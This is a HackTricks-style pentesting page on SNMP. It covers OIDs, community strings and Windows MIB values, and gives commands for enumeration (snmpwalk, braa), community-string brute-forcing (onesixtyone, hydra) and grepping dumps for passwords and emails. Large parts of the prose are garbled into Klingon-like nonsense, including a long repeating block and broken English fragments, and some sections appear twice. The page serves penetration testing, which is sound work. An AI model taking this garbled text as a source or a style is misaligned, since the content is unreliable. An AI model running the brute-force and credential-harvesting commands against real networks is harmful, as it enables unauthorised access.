| .. | ||
| cisco-snmp.md | ||
| README.md | ||
| snmp-rce.md | ||
161,162,10161,10162/udp - Pentesting SNMP
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Bug bounty tip: sign up for Intigriti, a premium bug bounty platform created by hackers, for hackers! Join us at https://go.intigriti.com/hacktricks today, and start earning bounties up to $100,000!
{% embed url="https://go.intigriti.com/hacktricks" %}
Basic Information
SNMP - Simple Network Management Protocol is a protocol used to monitor different devices in the network (like routers, switches, printers, IoTs...).
PORT STATE SERVICE REASON VERSION
161/udp open snmp udp-response ttl 244 ciscoSystems SNMPv3 server (public)
{% hint style="info" %} SNMP 162/UDP port traps jup. SNMP server client explicitly requested data packets. {% endhint %}
MIB
SNMP access manufacturers client-server combinations Management Information Base (MIB). MIB independent format device information. MIB text file queryable SNMP objects device standardized tree hierarchy. At least one Object Identifier (OID), unique address name, type, access rights, description object
MIB files Abstract Syntax Notation One (ASN.1) based ASCII text format. MIBs data, find information returns values specific OID, data type used.
OIDs
Object Identifiers (OIDs) Management Information Base (MIB).
MIB object IDs, OIDs, standard-setting organizations. Top levels global management practices standards.
Vendors private branches. Managed objects product lines. Structured method identifying managing objects vendors standards.
OID tree navigate http://www.oid-info.com/cgi-bin/display?tree=#focus OID means (1.3.6.1.2.1.1) http://oid-info.com/get/1.3.6.1.2.1.1.
Well-known OIDs 1.3.6.1.2.1 MIB-2 defined Simple Network Management Protocol (SNMP) variables. OIDs pending interesting host data (system data, network data, processes data...)
OID Example
1 . 3 . 6 . 1 . 4 . 1 . 1452 . 1 . 2 . 5 . 1 . 3. 21 . 1 . 4 . 7
-
1 – OID start
-
3 – ORG organization
-
6 – dod Department of Defense
-
1 – internet
-
4 – private organization
-
1 – enterprise or business entity
-
1452 – organization name
-
1 – device type
-
2 – remote terminal unit
-
5 – discrete alarm point
-
1 – specific point
-
3 – port
-
21 – port address
-
1 – display for port
-
4 – point number
-
7 – point state
SNMP Versions
2 important versions SNMP:
- SNMPv1: Main one, authentication string (community string) plain-text. Version 2 and 2c traffic in plain text community string authentication.
- SNMPv3: Authentication encrypted (dictionary attack harder SNMPv1 and v2).
Community Strings
Access information MIB community string versions 1 and 2/2c credentials version 3.
2 types of community strings:
publicread onlyprivateRead/Write
OID writability community string used, "public" used, write values. "Read Only" objects.
noSuchName or readOnly error received write object.
In versions 1 and 2/2c bad community string server respond. Valid community strings.
Ports
- SNMP agent requests UDP port 161.
- Manager notifications (Traps and InformRequests) port 162.
- Transport Layer Security or Datagram Transport Layer Security, requests port 10161 notifications port 10162.
Brute-Force Community String (v1 and v2c)
Guess community string dictionary attack. Different ways brute-force attack SNMP. Frequently used community string public.
Enumerating SNMP
tlhIngan Hol:
OID (Object Identifier) jatlh yIlo' 'e' cha'logh ghaH yIlo' **'e' OID yIghoS 'e' ghaH yIlo' **'e' device yIlo' **'e' jatlh yIlo' 'e' ghaH yIlo' **'e' OID yIghoS 'e' ghaH yIlo' 'e' cha'logh ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device yIlo' 'e' jatlh yIlo' 'e' ghaH yIlo' 'e' OID yIghoS 'e' ghaH yIlo' 'e' device
apt-get install snmp-mibs-downloader
download-mibs
# Finally comment the line saying "mibs :" in /etc/snmp/snmp.conf
sudo vi /etc/snmp/snmp.conf
SNMPWalk or SNMP-Check jatlhlaHchugh, valid community string jImejDI' data laH je.
snmpbulkwalk -c [COMM_STRING] -v [VERSION] [IP] . #Don't forget the final dot
snmpbulkwalk -c public -v2c 10.10.11.136 .
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP]
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP] 1.3.6.1.2.1.4.34.1.3 #Get IPv6, needed dec2hex
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP] NET-SNMP-EXTEND-MIB::nsExtendObjects #get extended
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP] .1 #Enum all
snmp-check [DIR_IP] -p [PORT] -c [COMM_STRING]
nmap --script "snmp* and not snmp-brute" <target>
braa <community string>@<IP>:.1.3.6.* #Bruteforce specific OID
Translation:
QapHa'moHwI': download-mibs jatlhlaHghach, extended queries (download-mibs) lo'laHbe'chugh, system vItlhutlhlaHbe'chugh enumerate qar'a'neS jatlhlaHbe'. Command vItlhutlhlaHbe'chugh:
command
HTML Translation:
QapHa'moHwI'
download-mibs jatlhlaHghach, extended queries (download-mibs) lo'laHbe'chugh, system vItlhutlhlaHbe'chugh enumerate qar'a'neS jatlhlaHbe'. Command vItlhutlhlaHbe'chugh:
command
snmpwalk -v X -c public <IP> NET-SNMP-EXTEND-MIB::nsExtendOutputFull
SNMP vItlhutlh 'e' vItlhutlh 'e' Host 'ej chenmoHmeH 'e' vItlhutlh 'e' 'e' vItlhutlh 'e' 'ej vItlhutlh 'e' 'e' vItlhutlh 'e' 'ej processes.
Dangerous Settings
In the realm of network management, certain configurations and parameters are key to ensuring comprehensive monitoring and control.
Access Settings
Two main settings enable access to the full OID tree, which is a crucial component in network management:
-
rwuser noauthis set to permit full access to the OID tree without the need for authentication. This setting is straightforward and allows for unrestricted access. -
For more specific control, access can be granted using:
rwcommunityfor IPv4 addresses, andrwcommunity6for IPv6 addresses.
Both commands require a community string and the relevant IP address, offering full access irrespective of the request's origin.
SNMP Parameters for Microsoft Windows
A series of Management Information Base (MIB) values are utilized to monitor various aspects of a Windows system through SNMP:
- System Processes: Accessed via
1.3.6.1.2.1.25.1.6.0, this parameter allows for the monitoring of active processes within the system. - Running Programs: The
1.3.6.1.2.1.25.4.2.1.2value is designated for tracking currently running programs. - Processes Path: To determine where a process is running from, the
1.3.6.1.2.1.25.4.2.1.4MIB value is used. - Storage Units: The monitoring of storage units is facilitated by
1.3.6.1.2.1.25.2.3.1.4. - Software Name: To identify the software installed on a system,
1.3.6.1.2.1.25.6.3.1.2is employed. - User Accounts: The
1.3.6.1.4.1.77.1.2.25value allows for the tracking of user accounts. - TCP Local Ports: Finally,
1.3.6.1.2.1.6.13.1.3is designated for monitoring TCP local ports, providing insight into active network connections.
Cisco
Take a look to this page if you are Cisco equipment:
{% content-ref url="cisco-snmp.md" %} cisco-snmp.md {% endcontent-ref %}
From SNMP to RCE
If you have the string that allows you to write values inside the SNMP service, you may be able to abuse it to execute commands:
{% content-ref url="snmp-rce.md" %} snmp-rce.md {% endcontent-ref %}
Massive SNMP
Braa is a mass SNMP scanner. The intended usage of such a tool is, of course, making SNMP queries – but unlike snmpwalk from net-snmp, it is able to query dozens or hundreds of hosts simultaneously, and in a single process. Thus, it consumes very few system resources and does the scanning VERY fast.
Braa implements its OWN snmp stack, so it does NOT need any SNMP libraries like net-snmp.
Syntax: braa [Community-string]@[IP of SNMP server]:[iso id]
braa ignite123@192.168.1.125:.1.3.6.*
Devices
The process begins with the extraction of sysDesc MIB data (1.3.6.1.2.1.1.1.0) from each file to identify the devices. This is accomplished through the use of a grep command:
Devices
The process begins with the extraction of sysDesc MIB data (1.3.6.1.2.1.1.1.0) from each file to identify the devices. This is accomplished through the use of a grep command:
grep ".1.3.6.1.2.1.1.1.0" *.snmp
Identify Private String
Qa'chuq vItlhutlh private community string vItlhutlh organization-mey, Cisco IOS router-meyDaq. running configurations vItlhutlh extraction-wI' vItlhutlh. Identification-wI' SNMP Trap data-Daq word "trap"-wI' grep command-wI' analysis-wI' vItlhutlh:
grep -i "trap" *.snmp
Usernames/Passwords
MIB jatlhlaHbe'chugh logon attempts laH 'ej, usernames ghotvam'e' accidentally include passwords. fail, failed, login laH keywords valuable data yIqaw.
grep -i "login\|fail" *.snmp
Emails
QaD (email addresses) ghItlh data extract laH, grep command regular expression vaj ghItlh, email format match patterns focus vaj:
grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" *.snmp
qoDmeywI' SNMP qarDaq HIq
NetScanTools vItlhutlh HIq qarDaq. HIq qarDaq private string vItlhutlh.
Spoofing
HIq qarDaq ACL 'e' vItlhutlh IPmey vItlhutlh SNMP HIqmey. UDP packet vItlhutlh IPmey vItlhutlh spoof 'ej traffic vItlhutlh.
SNMP Configuration files qel
- snmp.conf
- snmpd.conf
- snmp-config.xml
HackTricks Automatic Commands
Protocol_Name: SNMP #Protocol Abbreviation if there is one.
Port_Number: 161 #Comma separated if there is more than one.
Protocol_Description: Simple Network Managment Protocol #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for SNMP
Note: |
SNMP - Simple Network Management Protocol is a protocol used to monitor different devices in the network (like routers, switches, printers, IoTs...).
https://book.hacktricks.xyz/pentesting/pentesting-snmp
Entry_2:
Name: SNMP Check
Description: Enumerate SNMP
Command: snmp-check {IP}
Entry_3:
Name: OneSixtyOne
Description: Crack SNMP passwords
Command: onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt {IP} -w 100
Entry_4:
Name: Nmap
Description: Nmap snmp (no brute)
Command: nmap --script "snmp* and not snmp-brute" {IP}
Entry_5:
Name: Hydra Brute Force
Description: Need Nothing
Command: hydra -P {Big_Passwordlist} -v {IP} snmp
Bug bounty tip: Intigriti qIb bug bounty platform created by hackers, for hackers! Join us at https://go.intigriti.com/hacktricks today, and start earning bounties up to $100,000!
{% embed url="https://go.intigriti.com/hacktricks" %}
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.